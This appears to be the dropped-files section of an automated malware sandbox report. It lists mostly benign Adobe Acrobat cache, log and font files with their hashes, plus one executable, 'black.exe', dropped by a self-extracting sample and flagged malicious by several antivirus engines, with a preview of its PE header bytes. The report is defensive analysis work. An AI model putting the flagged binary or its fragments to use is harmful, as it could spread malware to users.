                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite Rollback Journal
                                                Category:dropped
                                                Size (bytes):8720
                                                Entropy (8bit):3.770470275674103
                                                Encrypted:false
                                                SSDEEP:48:7MRsUpA2ioyVTioyloWoy1Cwoy1PKOioy1noy1AYoy1Wioy11ioyeioyBoy1noyW:78sUpfuTR2X2jicb9IVXEBodRBkp
                                                MD5:4BBD2CB0C97061FDC4AF0E5D8547744F
                                                SHA1:AE0A149F226CF332DC0D6968BA7D09D7B2C1B008
                                                SHA-256:5AC1C3F4B933A564ABE687CDD0883083AE75CA292D47D4AA3E2154470A54BE34
                                                SHA-512:91B204B0FCBAF1D4FE0C66BFC3C68AF6AB3808293023AE93D8CE7F7B4BC9CA469D15A0D2073BC287F462558B289631D94AC57AC44310FEB9C0A52302375F9F3C
                                                Malicious:false
                                                Preview:.... .c......5L................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:Certificate, Version=3
                                                Category:dropped
                                                Size (bytes):1391
                                                Entropy (8bit):7.705940075877404
                                                Encrypted:false
                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                Malicious:false
                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):192
                                                Entropy (8bit):2.7130774337030337
                                                Encrypted:false
                                                SSDEEP:3:kkFkl5Vwlv+stfllXlE/HT8ku77l1NNX8RolJuRdxLlGB9lQRYwpDdt:kKDlLeT8/l7NMa8RdWBwRd
                                                MD5:4A6053066C7A84833BB925BCF001D2EC
                                                SHA1:3678320A5C9A09780B73446523B59BC42363B421
                                                SHA-256:0D13E7ABE62371CC91A3DA757A89AA7744A913F615AB51E69076D79146480750
                                                SHA-512:10A8F610DA4B8157A150BAC77728A52E9013385E14609781D3060749817DF55090509C92AAEB2C326ED9C87016F0E924590245CBFBDD0627D9DC327F2240589C
                                                Malicious:false
                                                Preview:p...... ........J..M.J..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):1233
                                                Entropy (8bit):5.233980037532449
                                                Encrypted:false
                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6244

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):1233
                                                Entropy (8bit):5.233980037532449
                                                Encrypted:false
                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):1233
                                                Entropy (8bit):5.233980037532449
                                                Encrypted:false
                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):10880
                                                Entropy (8bit):5.214360287289079
                                                Encrypted:false
                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6244

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):10880
                                                Entropy (8bit):5.214360287289079
                                                Encrypted:false
                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4
                                                Entropy (8bit):0.8112781244591328
                                                Encrypted:false
                                                SSDEEP:3:e:e
                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                Malicious:false
                                                Preview:....

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):1969
                                                Entropy (8bit):5.0470967544303305
                                                Encrypted:false
                                                SSDEEP:48:Y62sSbMSlMtCM5mMOpiMAW0MretMSMmkaMY:4tYtt55V6AWLre6JmkhY
                                                MD5:C01BB431919B73D0FCE5A4504275F362
                                                SHA1:756C37C8CE49A33BF70B5EAFDF0BA1E348FC87D9
                                                SHA-256:8B6B36A674CEF60FB0EC1C3A0FC580DA44AA9949F8D376BF6013FCECE82E60EA
                                                SHA-512:BFC69A412273E5B05DD240EECD4C478B5409A6054C6C8C34A46E71A82F2F18BEDCE771C272DD3896A28C10081D4B39EDE3510629D041F8EE173E4779619B190C
                                                Malicious:false
                                                Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1733724281000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"23c88c8acf166d9fda5ae4d83df3db72","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696420889000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d5fa85f4cf271b5fa75367efd1b392fa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696420884000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c3af48ba3dee086edbbf20dff46c7ee0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696333862000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7101e009d8bf8920d0a3dd3f5dc75ebc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696333862000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"8558394a527c224775253e57d0e3596a","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1696333862000},{"id":"DC_Reader_RHP_Banner","info":{"dg":

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):1.187441781567585
                                                Encrypted:false
                                                SSDEEP:48:TGufl2GL7msEHUUUUUUUU5nSvR9H9vxFGiDIAEkGVvpFH:lNVmswUUUUUUUU5n+FGSIt5H
                                                MD5:5E4D192D65909E747EF421EECF485240
                                                SHA1:804B55FFB3E10948A484D3E0E19C53D9B5CF9079
                                                SHA-256:31DBA3FB532827B6D37AB6C23D62FAB2307F40347CB31FD5D06F579D3849D375
                                                SHA-512:D584D8AF944B723FB55B9545AE6D8F991752CBF2BB7BFAFE495AD5C555B178907087093C73C098B70D5F1B7C5F242D2411D1CBD922BF4661FB083DC1CFDE3DC6
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite Rollback Journal
                                                Category:dropped
                                                Size (bytes):8720
                                                Entropy (8bit):1.6074402971898196
                                                Encrypted:false
                                                SSDEEP:48:7McKUUUUUUUUUU57vR9H9vxFGiDIAEkGVvEfqFl2GL7msB:74UUUUUUUUUU5LFGSItSfKVmsB
                                                MD5:8B0C23872C81F71BB58538AA44A7D06A
                                                SHA1:D44A036A5816A3FB82D595540484B112C84F5B83
                                                SHA-256:1F9D183D853AE6ECFC74EF1DEAB32628F5DE3D8891A51403671F6F35F711E3A7
                                                SHA-512:CB806951E97F24E3EF4DBBD5F006F86AF76D74E7138408151775F50E2A809AAFB1EB75251957CDD6A24ED9C8F711A9C9259020FAE6CB7B7AFCC7B294A7817559
                                                Malicious:false
                                                Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):66726
                                                Entropy (8bit):5.392739213842091
                                                Encrypted:false
                                                SSDEEP:768:RNOpblrU6TBH44ADKZEgablQ9WY0oQhFZ7EdOKnYBenlvYyu:6a6TZ44ADEabO9WYohFZzelvK
                                                MD5:BAE2A73B3683EEAA3FCAAA9915A73C2E
                                                SHA1:68327FE03B11F9FE7F217308B3531F03074F2367
                                                SHA-256:6CDDFBAAA66947E798D6FFEF3B5BFD050FE6F9DE7C6ABEA74B87EA905AD71F75
                                                SHA-512:B33647324966FD41B75AE89FFE918EE76605C93B251E347E8CF9CC22BA2D1EAF49BF96629C871528069F66EE7C40E33D31203290E748ABEB94D1BE20C63AA79C
                                                Malicious:false
                                                Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                C:\Users\user\AppData\Local\Temp\MSIc9751.LOG

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):246
                                                Entropy (8bit):3.5193370621730837
                                                Encrypted:false
                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88hlAiwlN1rCH:Qw946cPbiOxDlbYnuRKrYf1U
                                                MD5:13B87891961A07A9CD5AEDD6069D3728
                                                SHA1:81FDDEF7F5BE87DEAAD29500C6DE28D81658C6B2
                                                SHA-256:34A1D9C7DD52EDECC90991688A56BCBD376C51E87C6CAB14AE9ACADC6AD127FC
                                                SHA-512:689D72EAA2EEB1A1AB3CCD0FF0797549FA6B43F547EBBC153DDB2794359AF66353A5E315D740102163C270149A3EE66546DAD137D09F538C21B846449CBFC754
                                                Malicious:false
                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.9./.1.2./.2.0.2.4. . .0.1.:.0.5.:.2.3. .=.=.=.....

                                                C:\Users\user\AppData\Local\Temp\RarSFX0\[Content_Types].xml

                                                Download File
                                                Process:C:\Users\user\Desktop\Y5kEUsYDFr.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (302), with no line terminators
                                                Category:dropped
                                                Size (bytes):305
                                                Entropy (8bit):4.857483719766813
                                                Encrypted:false
                                                SSDEEP:6:JiMVBdDmUifoPWzcJ7RexJOG0XIQsJyLAxJmJBJ4lpAxJuhwc:MMHdD6fY4cufsXIQslfEgAfHc
                                                MD5:B9C3AE0E82195B170FEA8976D2EAFF22
                                                SHA1:4EBC61D576E45E7FA118EB909189B34FEE42791D
                                                SHA-256:14DEC7D1C20FC426AD5463D1B658F87A22F7E576BA4A08905CAF399551813A72
                                                SHA-512:AD82F54D5DBD951CC7F9B24D90A87DFDF1E1E839AA0C92DE7A813BA09BFF66F309274384275D0F38C7990A511EC2363341C516556230ED81D97EA62569A326EB
                                                Malicious:false
                                                Preview:.<?xml version="1.0" encoding="utf-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="dll" ContentType="application/octet-stream" /><Default Extension="pkgdef" ContentType="text/plain" /><Default Extension="vsixmanifest" ContentType="text/xml" /></Types>

                                                C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Y5kEUsYDFr.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):550912
                                                Entropy (8bit):7.713690387908805
                                                Encrypted:false
                                                SSDEEP:6144:eVtna0OB1sZqP+jPVtSfj+Bv/pvteHwxBBBvYfrZcE0X+VkV/M0wZSca7ForfYEd:E5f0+B3pUHwpJYTcOSV5suQeEFHncyQ
                                                MD5:09929B04B0C29E2722009F49FAF7183C
                                                SHA1:8FBACCD01E2F6E3213140402766B90E0409C92BE
                                                SHA-256:2AA22D6CD757C6E46D10FD8DB264481C299FF4646F2698C7A1976384D7C20EE2
                                                SHA-512:CC9728AF886B748119AE2BEDE4B7E9FF5F2245EEA3D1B9034E943D33A060D78E0191B8DF1B80E5E01F666B0DE6473C5D846CB446D7F83925BD83FBA5BE9D091B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 34%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..~............... ........@.. ....................... ............`.....................................(....................................................................................`.................H............text....|... ...................... ..`.|]Y................................ ..`.z~z.........`......................@....%?T.....X.......Z.................. ..`.rsrc................`..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-09 01-04-36-988.log

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:ASCII text, with very long lines (393)
                                                Category:dropped
                                                Size (bytes):16525
                                                Entropy (8bit):5.345946398610936
                                                Encrypted:false
                                                SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                Malicious:false
                                                Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                Download File
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):15110
                                                Entropy (8bit):5.34439448979523
                                                Encrypted:false
                                                SSDEEP:384:fr96lrQRCzOY6dGj1bxYgyzKmlcN7S29bMFJDnTCvRl9/PjOuphT8b8hAjBf4JR8:BRx
                                                MD5:2F0D5120C157C3D04020BAE9EBB40621
                                                SHA1:3FFBC800F05811ADADDFF800841CDB0FB0CF1AFD
                                                SHA-256:3920A3D7F87EBA513DD1F689356B237C70EA58118EED19BB8AAAAA7E73EC937D
